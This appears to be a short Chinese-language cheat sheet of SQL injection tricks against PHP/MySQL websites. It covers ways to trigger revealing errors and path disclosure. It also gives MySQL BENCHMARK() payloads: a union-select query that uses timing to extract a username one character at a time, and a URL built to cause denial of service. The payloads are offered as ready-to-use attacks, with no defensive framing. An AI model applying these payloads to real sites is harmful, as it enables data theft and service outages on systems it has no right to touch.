1、加引号'这个最常用

2、变参数类型，比如把id=1改为id=a等 有时很有效果

3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果

4、text.php?aa[]=xx

5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试.

6、benchmark( 999999999999999999, md5( 'test' ) )

   BENCHMARK(count,expr)：BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。

   id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*

   利用找个函数可以作拒绝服务攻击！！http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))，不过前提还是要求可以注射。